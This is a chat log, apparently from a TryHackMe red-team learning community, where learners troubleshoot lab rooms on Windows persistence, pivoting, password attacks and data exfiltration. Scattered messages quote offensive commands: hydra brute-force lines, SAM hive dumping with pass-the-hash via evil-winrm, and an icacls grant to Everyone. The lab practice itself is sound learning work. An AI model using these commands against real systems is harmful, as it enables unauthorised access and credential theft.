Gave +1 Rep to @royal void

torn lodge
#

I'm having some issues with cewl and the Nokogirl package when trying to generate the list. Has anyone found this problem and a solution to it?

native berry
torn lodge
#

cewl is complaining about an uninitialized constant on my end for the Nokogiri:classresolver... I guess an update of that package on my end is not working well or something. I might look into removing it if that is all that can be done.

#

nokogiri

native berry
torn lodge
#

well, I removed it and it removed cewl with it but upon execution it requested to install cewl again and that resolved the problem

#

yes, it seems it is part of the internals of cewl

#

I did a: sudo apt-get remove ruby-nokogiri and then got 'cewl' command not found after that, but it prompted me to install the application again... so we are all good here

echo ore
torn lodge
#

roughly speaking... how long did the http-post-form and the password spray attacks take for you? I was running the first and sort of gave up because it was taking forever... and the ssh attack is also taking a good while

#

k... got SSH

grand heart
#

https://tryhackme.com/room/dataxexfilt# currently trying to get an http tunnel setup for task 6 but dispite doing what the instructions say all i get is "Empty reply from server" this is both using kali through vm and attackbox

lucid plume
#

someone having problems with this.. task 2 Win Local persistance...

#

never make system.bak

grand heart
#

i had issues with that i waited an hour and nothing but cancled and reissued the command and it worked for me

lucid plume
#

the problem is system.bak, sam.bak do it instantly

#

i already cnacel and try 20 times

grand heart
#

ya not sure what was going on had to reissue the command to get it to work it hanged the first time

lucid plume
#

cant pass this task cause of it

#

since yesterday

royal void
#

system.bak is a lot larger hence it takes more time

lucid plume
royal void
#

obviously not that long'

grand heart
#

ya dont know what was happening for me but it was much quicker when i cancled and reissued the command

lucid plume
#

ive already canceled it many times

grand heart
#

and resolved my issue on the other room the page gives you the wrong ip

lucid plume
#

so frustrating cant go on cause of it

royal void
#

well we could cheat a bit if you are okay with that

#

shadow has the hashes stored so that you could use that to jump to the log in with evil-winrm and the hash

lucid plume
royal void
#

so it okay if shadow dm:s the hashes then???

lucid plume
#

yeah

royal void
#

and sent

grand heart
royal void
#

shadow had another problem after making said files as they did not want to download to shadows machine so shadow had to download them to the attackbox

royal void
grand heart
#

thank you for informing i neglected that

lucid plume
#

thanks both, will take notes of that

grand heart
#

and sent a message too the channel

jade flume
# echo ore wget should work. If it doesn't, you can always use impacket's smbserver.py scri...

Thanks and how about this too any hint please ? Hey friends how y’all doing I need help with windows persistence task 4 abusing services after trying to create a service and while trying to execute I get this error = the service didn’t response to the start or control request in a timely fashion what I’m I doing wrong and do you all have to start the room all over again just cause you are not able to finish it and you won’t be able to retrieve the next flag cause you didn’t retrieve the last one just asking cause I had to start this over and over again cause I can’t finish it all at once

thin irisBOT
#

Gave +1 Rep to @echo ore

royal void
jade flume
#

Same syntax provided for us from the question I did copy and paste directly to make sure I’m doing it right infact

#

I might have to go back to the question and set up my question since I already move to other room cause im having difficulty with it

manic umbra
#

finally finished that persistence room. It's a lot but I didn't have that much fun with a room for a long time. Congrats creator

royal void
manic umbra
#

A question about the next room. Pivoting https://tryhackme.com/room/lateralmovementandpivoting . It says I have 2 days of access left. Does that mean I have to finish it in 2 days and after that I can't access the room, the network, anymore. In case I want to redo it with better notes ?

jade flume
#

I think that might be the issue right ?

royal void
#

Β―_(ツ)_/Β―

manic umbra
real meadow
#

On task 8 in windows local persistence, when I try to access the aspx shell I get a 401 unauthorized error

jade flume
jade flume
#

It won’t let me start the service

#

That’s the issue I’m having

lucid plume
#

😭

royal void
manic umbra
royal void
manic umbra
jade flume
thin irisBOT
#

Gave +1 Rep to @manic umbra

jade flume
# lucid plume 😭

Well I have the same issue myself try to run the flag script from rdp login rather than evil win

manic umbra
# lucid plume 😭

I had massive problems with that one. I've created a new connection, didn't reuse the edite adminsitrator connection (in remmina)

real meadow
#

Bypassed it by running icacls

#

Everyone:F

royal void
# lucid plume 😭

oh wait thmuser3??? did you change the hex that you needed to change in registry???? if yes log in as the normal administrator account and then run the flag exe for that task

lucid plume
royal void
#

see the programs bar and the right most icon

lucid plume
#

should appears that window after the command psexec??

royal void
#

that is the regedit icon so it is open

lucid plume
#

still not working..

manic umbra
manic umbra
lucid plume
jade flume
manic umbra
#

python3 -m http.server on the attacker machine, of course

jade flume
#

Thanks will give this a shot again

manic umbra
#

it worked for me a minute ago

lucid plume
#

even split view is gettin error

manic umbra
manic umbra
#

if I find what task that is πŸ˜„

lucid plume
#

is getting very annoyng the task

#

many problem

#

since yestarday

manic umbra
#

yes, this one was but you'll get it

lucid plume
#

2 days doing the task

manic umbra
#

what task is this ?

#

got it

#

let's try

lucid plume
#

task 2, win local persistance

#

ive already make thmuser3 can connect remotly

#

but isnt connecting

#

not with the hash with evil winr

#

not split view

#

with Password321

manic umbra
#

I'll redo it now. I know that thmuser3 hasn't had remote connection privileges

lucid plume
#

got it!!!! thmuser3 flag done!!!!

#

finnaly connected!

manic umbra
#

this time I got it way easier too lol

lucid plume
#

nice!

manic umbra
#

what did you do different

#

I know I fcked up the first time because I didn't mark and replace the hex digits so I've actually added some isntead od replace it.

#

maybe that's the reason

lucid plume
#

shut down the machine

#

XD

manic umbra
#

so if some of the mods or the creator can answer my question. Because the room is still resetting and I can't do anything

manic umbra
lucid plume
lucid plume
#

oh no... is flag 5

solar coral
#

Anyone having issues with task 4 in windows privesc room? Netcat using both kali and attackbox don't want to connect, currently out of my house so I can't use my VM to see if it's a me issue or if it's a step issue, and yes I did reread and restart the VM twice

solar coral
lucid plume
#

hi, make the changes but not getting reverse shell, task 3, flag 6 win local persistance..

lucid plume
echo ore
# manic umbra this one

Don't worry about that. You'll just have to rejoin the room, but your progress won't be affected in any way. This is just a way to cope with inactive users hogging on lab seats 😬

echo ore
# lucid plume

You are changing the wrong progID. "textfile" != "txtfile"

tropic ginkgo
#

Only one task to finish!

#

Everything

#

Signature Evasion task 7

lucid plume
thin irisBOT
#

Gave +1 Rep to @echo ore

scarlet barn
#

Did anyone have a big issue getting Armitrage set up? It says it won't connect to the database, but I've verified that it is started. I'm on a fresh ubuntu OS.

twin tundra
#

@scarlet barn yeah man even after setup i had so many config errors, i ended up skipping that part lol

scarlet barn
#

Lol sounds good. I'll just use sliver then

#

Thanks @twin tundra

thin irisBOT
#

Gave +1 Rep to @twin tundra

torn lodge
# calm gyro 537026

I ended up with 535976... oh dear... what is the expected length of the clinic file?

#

^ This is for the result of using the rule in 'hints' for user burgess btw

#

I ^C'ed it after 15 minutes because it seemed a bit excessive and very likely 'cause I did something wrong somewhere in there

torn lodge
#

upped the tasks to 64 simultaneous but nothing yet

#

oh my goodness... it was one real dumb mistake... welp

#

got it

lucid plume
#

hi people, im not having permisio to open flag9 on task 4 wins local persistance... any idea?

#

and cant delete SD file

echo ore
lucid plume
echo ore
#

al flags are independent, so you can go straight away for flag9

lucid plume
echo ore
lucid plume
echo ore
#

yes, there are instructions on that on the task as well πŸ™‚

thin irisBOT
#

Gave +1 Rep to @echo ore

lucid plume
lucid plume
#

nice! room done!

rose beacon
prisma verge
#

Hi guys, anyone having problems using dig on Attackbox for the domain transfer task in the enumeration room? I always get "The term 'dig' is not recognized as the name of a cmdlet...."

prisma verge
#

I fixed it

#

was using it on the windows machine^^

fickle halo
#

hydra -l burgess -P burgess.txt 10.10.104.200 http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

fickle halo
#

Please any help

vestal mantle
native berry
native berry
fickle halo
#

it is http-post-form....missed that,it was the error

#

There wasn't an error,it wasn't connecting......so I restarted the machine

#

Thanks guys

jade flume
#

Hello mate I’m trying to solve lateral movement and according to the instructions if you are using your personal computer you need to set the dns and again set a default one too in confuse as thus is the first time I will be doing something like thus how do I get that done please, the picture above is what have tried but it won’t let me save it so I’m confuse

celest vessel
#

How does your code look like to attack the burgess account? @naive sundial

jade flume
celest vessel
#

but if you are using BURP suit you are doing something I cannot troubleshoot

#

I don't have experience with BURP for the moment

#

so maybe someone else can help

#

And this command is also not correct

#

I don't think so

#

because it is the intention you have a longer wordlist due to the single extra rule

#

it is still missing items

#

like /login-post/ should be /login-post/index.php

#

and on the end you should use S=logout.php instead of F= ..

#

I don't have them here, my Kali VM is at home πŸ˜…

#

you should have a result in less than a minute

#

if it takes two minutes, it is already wrong

#

so you don't have to cross the complete wordlist

manic umbra
#

:Q

celest vessel
#

you are just typing some commands without understanding imo

#

but ok

manic umbra
#

yes, i guess. But I'll try to configure it with somethiung else

celest vessel
#

wait who are you? Bonzo = W4h33D? πŸ˜„

manic umbra
#

No, wrong window lol πŸ˜„

#

sorry, was writing why pivoting network doesn't work, with another guy πŸ˜„

copper dawn
#

Runtime Detection Evasion

#

Task 7 - Patching AMSI

#

who can help please? :/

ornate hull
#

any help with task

#

i have been trying for 3days

calm gyro
ornate hull
calm gyro
#

What seasons did you put as password?

copper dawn
#

I get no flag 😦

ornate hull
native berry
torn lodge
#

DNS resolution keeps dropping on my Lateral Movement and Pivoting room... any experiencing this too? restarting the systemd-resolved service does the trick but it is kind of frustrating

jade flume
torn lodge
#

nope... AttackBox

jade flume
#

Hello mate I’m trying to use my own Kali any idea how to config the dns ?

torn lodge
#

I did... it works but once in a while it drops

#

and the file on the attackBox is /etc/systemd/resolved.conf

#

just add the DNS address to the DC under 'DNS=' as per the instructions

#

right but the instructions show the mods made to the other file

#

I omitted that part this time in reading though yeah... I was aware of that... it had just happened 2 or 3 times within the span of 5 minutes

#

yeah, I'll mess with the /etc/resolv.conf if it continues to do this

#

thanks @weak ice

thin irisBOT
#

Gave +1 Rep to @weak ice

copper dawn
#

can please someone help me with room "Runtime Detection Evasion" on Task 7 - Patching AMSI? I get no flag on the desktop?! when I run the script, I got a "true" as output in Power Shell? please help!

jade flume
slim fern
#

hello i have a problem in enumeration room task3 question 2 what is the version numer i copy it from a attack box(i have the maschine started and the attack box as they requested) and there is a wrong anwser any help?

slim fern
#

quick ss

#

k sorry i was too focusd on the task

cyan stream
#

In the "Intro to C2" room, I am trying to enable postgresql. I changed the "start" to "enable" and that enabled the server, the "preset" is still showing disabled. How do I enable that?

#

Task 4*

royal void
cyan stream
#

My own Kali VM

royal void
#

oh okay dunno then

prime knot
#

Task8 in Password Attacks - the thing with login-post - I dont know what I am doing wrong but my attacks are very long - almost half of the hour - could anyone help??

wind boneBOT
prime knot
#

I have to restart my kali attack machine πŸ˜„ as it second time expired

#

oh maybe this is the reason

celest vessel
#

Or you can just download the latest Kali?

#

I have had my fair share of issues with the attackbox

lucid plume
#

exfiltration => why cant untar the file??

celest vessel
#

well sometimes it is slow or not very responsive

#

especially with the nmap queries

manic umbra
#

Lateral Movement and Pivoting room, exceptional room and information from there, great job @echo ore . And no problems finishing it at all.Either I'm learning windows or I'm lucky. A little slow though, especially using mimikatz. The last flag is easy to finish, but pretty hard to understand what's going on. Well explained though. I might become a windows fan after I finish that path πŸ˜„

echo ore
manic umbra
#

No, it worked really good and no one resets πŸ˜„

lucid plume
#

all red team is pure gold!! Congrats all the people how worked in it!!

solar coral
#

Is Windows Privilege Escalation broken for task 6? Tried Attackbox, Kali, and VPN for impacket and all give me the following error

SAM hashes extraction failed: 'NoneType' object is not subscriptable
mystic sage
#

Maybe check the version of python youre using, pyenv can help you solve issues like this sometimes if you need a specific version for impacket

solar coral
solar coral
#

Also attempted Python 3.10 as well

lucid plume
solar coral
#

from what I've tested so far, smbserver.py works without issue

solar coral
lucid plume
solar coral
# lucid plume worked?

Ended up booting an ancient version of Parrot OS I had and it worked in there, no idea what is causing the issue on attackbox, kali, or my VM install

lucid plume
solar coral
#

by ancient I mean not updated in about 6-8 months and just moved the .hive files there

solar coral
#

Did you install impacket through pip or just apt?

lucid plume
#

mmm dont remember...

#

look for it in github

solar coral
thin irisBOT
#

Gave +1 Rep to @lucid plume

marsh birch
#

Hi!! I have problems with a theorical question in the "windowsapi" room. I don't know the answer to "What type of method is used to reference the API call to obtain a struct?"

I've reviewed the previous parts of the room trying to understand it better but nothing.

I think if you reference the api call, yo need a memory reference no?

marsh birch
#

Ok I've already discover it.... I knew the answer but it was a "lexical" problem

harsh spruce
#

Hello!
I'm still stuck there and I tried everything ...

#

Found it!

marsh birch
ornate hull
native berry
# ornate hull Spring2022@

Ok, general syntax would look right, so you probably just missing out the correct password in your list

ornate hull
native berry
ornate hull
native berry
ornate hull
#

Hydra -U username.txt -P password.txt ssh://127.0.0.1 -t5 -vv

native berry
ornate hull
#

Ok

ornate hull
native berry
brave sinew
#

Haha. Finally found the last two passwords. the room encourages to follow it exactly and not try to think by yourself :/ || the login failure message does appear in the successful login as well and is not usable for F= ||

red tangle
#

hey all, need help in threat intel task 7

#

after the flag

manic umbra
#

I have some questions about Data exfiltration, Task 10 DNS tunneling, i get a connection over iodine, ssh. But accessing the homepage gives me thm@attacker:~$ curl --socks5 127.0.0.1:1080 http://192.168.0.100/test.php channel 1: open failed: connect failed: Connection refused curl: (7) Failed to receive SOCKS5 connect request ack.

red tangle
#

witch task?

manic umbra
#

Task 10

#

tcp 0 0 127.0.0.1:1080 0.0.0.0:* LISTEN 49/ssh The connection is established, on the attacker

red tangle
#

witch room?

manic umbra
#

Theoretically, if I wanted to cheat, I could access the homepage from the jump box ?

#

I have some questions about Data exfiltration, Task 10 DNS tunneling,

indigo pulsar
#

issue with windows persistence room where RDP session returns a black screen after login and logout multiple times. Making parts of the persistence through logon not solvable https://tryhackme.com/room/windowslocalpersistence

red tangle
#

sorry man i didn't do it can't help

indigo pulsar
#

just reporting it lol

manic umbra
manic umbra
indigo pulsar
lucid plume
manic umbra
indigo pulsar
#

anyways

#

done

manic umbra
lucid plume
velvet root
#

Anyone have any advice on Task 2 for Signature Evasion.

stiff basalt
#

N00b question but copy and pasting msfvenom output from the attackbox to the windows vm is not working, any suggestions?

#

Weaponization room

vast quest
#

By not working, do you mean you can't paste it?

stiff basalt
#

Correct

vast quest
#

Full screen the machine πŸ™‚

#

Press the diagonal arrow on the bottom of the attackbox

stiff basalt
#

hmm, that is done

vast quest
#

You should now be able to copy and paste between the your host and attackbox

stiff basalt
#

ahh, I can do that, however, I cant paste into the windows vm. Sp attackbox to host works, but attackbox to windows vm or host to windows vm does not

vast quest
#

Is that full screen too?

stiff basalt
#

Yeah both attackbox and windows vm are full screen